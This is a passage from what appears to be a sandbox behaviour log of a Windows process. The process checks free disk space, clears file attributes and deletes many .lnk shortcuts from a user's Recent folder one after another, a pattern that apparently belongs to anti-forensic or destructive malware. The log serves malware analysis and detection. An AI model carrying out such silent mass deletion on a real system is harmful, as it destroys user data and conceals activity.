(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eM xNObhytpC5.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\em xnobhytpc5.lnk")) returned 1 [0150.249] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.255] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\f0dhYZcLaq_T3.lnk", dwFileAttributes=0x80) returned 1 [0150.255] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\f0dhYZcLaq_T3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\f0dhyzclaq_t3.lnk")) returned 1 [0150.258] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.263] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F5_.lnk", dwFileAttributes=0x80) returned 1 [0150.264] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\F5_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\f5_.lnk")) returned 1 [0150.267] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.273] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FAyx68rMZymIQpM7.lnk", dwFileAttributes=0x80) returned 1 [0150.274] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\FAyx68rMZymIQpM7.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\fayx68rmzymiqpm7.lnk")) returned 1 [0150.276] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.281] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\G9NG-_S2UXtBfKgqMo.lnk", dwFileAttributes=0x80) returned 1 [0150.282] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\G9NG-_S2UXtBfKgqMo.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\g9ng-_s2uxtbfkgqmo.lnk")) returned 1 [0150.285] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.290] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gLVr4eTAQIV.mkv.lnk", dwFileAttributes=0x80) returned 1 [0150.290] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gLVr4eTAQIV.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\glvr4etaqiv.mkv.lnk")) returned 1 [0150.293] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.298] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gt_VL6mW.lnk", dwFileAttributes=0x80) returned 1 [0150.299] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gt_VL6mW.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gt_vl6mw.lnk")) returned 1 [0150.301] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.306] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gVP4XW OQnjnrz09j.lnk", dwFileAttributes=0x80) returned 1 [0150.307] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gVP4XW OQnjnrz09j.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gvp4xw oqnjnrz09j.lnk")) returned 1 [0150.310] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.316] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GV_QpvTebTk0bD3u.lnk", dwFileAttributes=0x80) returned 1 [0150.316] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GV_QpvTebTk0bD3u.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gv_qpvtebtk0bd3u.lnk")) returned 1 [0150.319] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.324] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GzwKyLv5f2WnwBr.lnk", dwFileAttributes=0x80) returned 1 [0150.324] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GzwKyLv5f2WnwBr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gzwkylv5f2wnwbr.lnk")) returned 1 [0150.327] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.332] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h-K_HDxTPYr y4.ots.lnk", dwFileAttributes=0x80) returned 1 [0150.333] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h-K_HDxTPYr y4.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h-k_hdxtpyr y4.ots.lnk")) returned 1 [0150.336] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.341] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H54h gwe88d1.lnk", dwFileAttributes=0x80) returned 1 [0150.342] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H54h gwe88d1.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h54h gwe88d1.lnk")) returned 1 [0150.344] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.349] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hLStynB7c2W.lnk", dwFileAttributes=0x80) returned 1 [0150.350] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\hLStynB7c2W.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hlstynb7c2w.lnk")) returned 1 [0150.353] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.358] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h_YqYV0OrRv6VAyCoJaO.lnk", dwFileAttributes=0x80) returned 1 [0150.358] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h_YqYV0OrRv6VAyCoJaO.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h_yqyv0orrv6vaycojao.lnk")) returned 1 [0150.361] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.366] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ibEIap2.lnk", dwFileAttributes=0x80) returned 1 [0150.366] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ibEIap2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ibeiap2.lnk")) returned 1 [0150.369] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.375] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\icR-6OCAlgef0m_0.lnk", dwFileAttributes=0x80) returned 1 [0150.375] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\icR-6OCAlgef0m_0.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\icr-6ocalgef0m_0.lnk")) returned 1 [0150.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.383] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\isQempcYc.lnk", dwFileAttributes=0x80) returned 1 [0150.384] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\isQempcYc.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\isqempcyc.lnk")) returned 1 [0150.386] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.391] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\J-w7YMI.lnk", dwFileAttributes=0x80) returned 1 [0150.392] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\J-w7YMI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\j-w7ymi.lnk")) returned 1 [0150.394] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.400] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j687X_V.lnk", dwFileAttributes=0x80) returned 1 [0150.400] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j687X_V.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\j687x_v.lnk")) returned 1 [0150.403] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.408] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jgxj8NICsf0.lnk", dwFileAttributes=0x80) returned 1 [0150.409] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jgxj8NICsf0.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jgxj8nicsf0.lnk")) returned 1 [0150.411] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.417] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jmQBS2LKR-t.lnk", dwFileAttributes=0x80) returned 1 [0150.417] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jmQBS2LKR-t.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jmqbs2lkr-t.lnk")) returned 1 [0150.420] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.425] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JPoWRBvwhI sYT.lnk", dwFileAttributes=0x80) returned 1 [0150.426] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JPoWRBvwhI sYT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jpowrbvwhi syt.lnk")) returned 1 [0150.428] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.435] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JTmSs8VbF2WejV.lnk", dwFileAttributes=0x80) returned 1 [0150.435] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JTmSs8VbF2WejV.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jtmss8vbf2wejv.lnk")) returned 1 [0150.438] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.443] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jXgDvdkwn72.lnk", dwFileAttributes=0x80) returned 1 [0150.444] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jXgDvdkwn72.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jxgdvdkwn72.lnk")) returned 1 [0150.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.453] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JyWp1hLdRx28B.lnk", dwFileAttributes=0x80) returned 1 [0150.454] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JyWp1hLdRx28B.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jywp1hldrx28b.lnk")) returned 1 [0150.456] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.461] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j_It.flv.lnk", dwFileAttributes=0x80) returned 1 [0150.462] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\j_It.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\j_it.flv.lnk")) returned 1 [0150.465] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.470] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k2bCl2fftX99eWdLQv.lnk", dwFileAttributes=0x80) returned 1 [0150.470] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\k2bCl2fftX99eWdLQv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\k2bcl2fftx99ewdlqv.lnk")) returned 1 [0150.473] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.478] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\krn8OUUWVtzhbT9Qc.lnk", dwFileAttributes=0x80) returned 1 [0150.478] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\krn8OUUWVtzhbT9Qc.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\krn8ouuwvtzhbt9qc.lnk")) returned 1 [0150.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.487] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kUOYrT.lnk", dwFileAttributes=0x80) returned 1 [0150.487] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kUOYrT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\kuoyrt.lnk")) returned 1 [0150.490] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.495] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KWhhlCPR1LB9MfxWs1l.mkv.lnk", dwFileAttributes=0x80) returned 1 [0150.495] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\KWhhlCPR1LB9MfxWs1l.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\kwhhlcpr1lb9mfxws1l.mkv.lnk")) returned 1 [0150.498] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.503] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kZCnPzNo.lnk", dwFileAttributes=0x80) returned 1 [0150.503] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kZCnPzNo.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\kzcnpzno.lnk")) returned 1 [0150.506] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.512] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kZIzcHT.lnk", dwFileAttributes=0x80) returned 1 [0150.512] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\kZIzcHT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\kzizcht.lnk")) returned 1 [0150.515] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.520] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lHvtd.lnk", dwFileAttributes=0x80) returned 1 [0150.520] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 